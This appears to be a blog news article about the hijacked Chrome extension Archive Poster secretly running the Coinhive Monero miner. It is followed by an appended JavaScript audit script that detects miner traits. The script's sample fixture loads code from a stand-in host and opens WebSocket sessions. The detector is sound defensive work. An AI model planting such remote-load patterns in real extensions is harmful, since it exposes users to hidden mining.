Sunday, February 5, 2023

Chrome Extension ‘Archive Poster’ Is Being Used to Mine Cryptocurrency

Have you heard of “crypto-jacking”? You should — it’s become quite common in the last few months. The idea of using someone else’s computer’s resources to mine digital coins without their permission has grown alongside crypto asset prices, and a popular Chrome extension is the latest culprit.

Hijacking Others’ Computers Now a Regular Threat

Archive Poster is supposedly designed to assist users wishing to repost Tumblr blogs. However, aside from its claimed operations, reviews in the Chrome store stated Archive Poster is surreptitiously running Coinhive — a distributed-network mining program for digital currency.

One review exclaimed:

“ATTENTION! DANGEROUS! This extension is hijacked since a few weeks with a code which mines crypto-currency, which means it will change and read ALL data and sites you visit and causes 100 percent CPU usage.”

Another warned users to stay away, saying, “Do not use this extension as it comes loaded with a cryptocurrency mining script. Once installed, it makes requests to Coinhive which eats up your CPU time and slows your computer down massively. Avoid.”

As of December 29th, a newer version of Archive Poster has appeared in the Chrome Web Store, marked “safe”. At press time, though, it had no ratings or reviews.

Crypto-Jacking Miners Prefer Monero

As with last week’s announcement that Facebook Messenger was being used for similar purposes, Monero is the cryptocurrency that hackers seem to be after, and the developer of Archive Poster is using it to grow his (or her) XMR stash with a little help from your electricity and computer.

The Archive Poster extension previously had over 105,000 users, all of whom were likely (and unknowingly) mining Monero through their own systems.

Chrome Users Aren’t Getting Much Help

Despite numerous complaints and warnings from customers over the past few weeks, it took Google several weeks to remove the malicious extension from the Chrome Store. One user even claimed to have reported Archive Poster in the Google Chrome Help Forum, but was told by an online staffer to “get in touch with the extension developer for further assistance.”

Thus far, the developer has remained silent on the hack, and has not provided any information regarding when or how it took place, or who is responsible for it.

U.S.-based security researcher Troy Mursch stated that the crypto-jacking code hides within a JavaScript file loaded from a given URL. Once the hacked computer is activated, three web-socket sessions are invoked, and the application immediately begins mining cryptocurrency without user permission.

Users that installed the application recently are advised to type chrome://extensions into their browsers and click on the trash can icon next to the extension to get rid of it.
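
The traits reported above (requests to Coinhive, a JavaScript file fetched from a URL, WebSocket sessions, and access to every site visited) can be looked for statically in an unpacked extension's files. The following is an added example, not code from the article or from the researcher it quotes; the function names, rule set and sample extension contents are constructed for illustration.

```javascript
// Added example: static triage of an unpacked Chrome extension.
// Rule names, function names and the sample extension are constructed.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Heuristics keyed to the reported behaviour; each hit is a hint, not proof.
const SOURCE_RULES = [
  { id: "coinhive-reference", re: /coinhive/gi },
  { id: "websocket-session", re: /new\s+WebSocket\s*\(/g },
  { id: "remote-script-load", re: /\.src\s*=\s*["'`](?:https?:)?\/\//g },
];

function auditExtension(manifest, sources) {
  const findings = [];
  // Manifest V2 keeps host patterns in "permissions"; V3 in "host_permissions".
  const hosts = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const h of hosts) {
    if (BROAD_HOSTS.has(h)) findings.push({ id: "broad-host-access", file: "manifest.json", hits: 1 });
  }
  for (const [file, text] of Object.entries(sources)) {
    for (const { id, re } of SOURCE_RULES) {
      const m = text.match(re); // global regex: returns every match or null
      if (m) findings.push({ id, file, hits: m.length });
    }
  }
  return findings;
}

// A named miner reference is decisive; remote code plus sockets needs a human look.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  if (ids.has("coinhive-reference")) return "known-miner-reference";
  if (ids.has("remote-script-load") && ids.has("websocket-session")) return "review-manually";
  return "no-indicators";
}

// Constructed sample: file name -> source text, as read from an unpacked extension.
const SAMPLE_MANIFEST = { name: "sample-extension", permissions: ["tabs", "<all_urls>"] };
const SAMPLE_SOURCES = {
  "background.js": 'var s = document.createElement("script");\n' +
    's.src = "https://cdn.example.invalid/lib.js";\ndocument.head.appendChild(s);',
  "lib.js": "// coinhive loader (constructed marker text)\n" +
    'for (var i = 0; i < 3; i++) new WebSocket("wss://ws.example.invalid/" + i);',
};

const sampleFindings = auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES);
console.log(verdict(sampleFindings), sampleFindings);
```

A clean result here only means none of these textual markers are present; obfuscated or remotely fetched code will not match, which is why the remote-script rule is reported on its own.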

Will we continue to see cases of crypto-jacking in the coming months as digital currency prices rise?